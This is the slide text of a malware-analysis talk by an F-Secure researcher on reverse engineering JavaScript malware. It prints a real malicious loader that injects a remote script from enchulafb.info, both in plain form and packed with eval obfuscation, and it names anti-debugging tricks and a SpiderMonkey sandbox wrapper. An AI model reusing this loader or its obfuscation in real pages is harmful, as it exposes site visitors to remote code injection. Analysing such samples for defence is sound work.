Reverse Engineering Interpreted Languages
Karmina Aquino F-‐Secure Corpora3on
Compiled vs Interpreted
0 1 0 0 1 0 0 0 0 1 0 0 1 0 0 1
aload_0 iconst_0 iconst_3 istore_2 iload_3
Examples of Interpreted Languages
Why Javascript?
Why do malware authors use Javascript?
Cross-browser compatibility
Default HTML script language
AJAX
Supported by several applications
<script>
<iframe src ='test.js' width=0 height=0></iframe>
<!-- ***Javascript code*** --> </script>
TAGS
<script type='text/javascript'>
<script type='text/javascript' src='test.js'></script>
document.write() document.createElement()
eval()
location.reload() location.replace() location.href()
onLoad() onUnload() onSubmit()
Objects and Global Functions
loadScript_YOU(); function loadScript_YOU() {
if ('https:' == document.location.protocol) return false; var s = document.createElement('script'); s.setAttribute("type","text/javascript"); s.setAttribute("src", "http://enchulafb.info/script.js"); var head=document.getElementsByTagName("head")[0]; if( head==null) return false; head.appendChild(s); return true;
}
eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3();9 3(){4(\'b:\'==1.c.d)2 5;6 s=1.e(\'7\');s.8("f","g/h");s.8("i","j://k.l/7.m");6 a=1.n("o")[0];4(a==p)2 5;a.q(s);2 r}',29,29,'|document|return|loadScript_YOU|if|false|var|script|setAttribute|function||https|location|protocol|createElement|type|text|javascript|src|http|enchulafb|info|js|getElementsByTagName|head|null|appendChild|true|'.split('|'),0,{}))
eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3();9 3(){4(\'b:\'==1.c.d)2 5;6 s=1.e(\'7\');s.8("f","g/h");s.8("i","j://k.l/7.m");6 a=1.n("o")[0];4(a==p)2 5;a.q(s);2 r}',29,29,'|document|return|loadScript_YOU|if|false|var|script|setAttribute|function||https|location|protocol|createElement|type|text|javascript|src|http|enchulafb|info|js|getElementsByTagName|head|null|appendChild|true|'.split('|'),0,{}))
own obfuscation code
Dean Edwards /packer/
eval(function(p,a,c,k,e,d)…
anti-debugging
arguments.callee.toString() location.href document.cookie
SPIDERMONKEY
document = { write:print }; eval = function(input_string) { print("eval(" + input_string + ")"); } // and so on
js.exe –f wrapper.js –f malware.js
h5ps://developer.mozilla.org/En/SpiderMonkey/Introduc3on_to_the_JavaScript_shell
wrapper.js
Real-world Scenario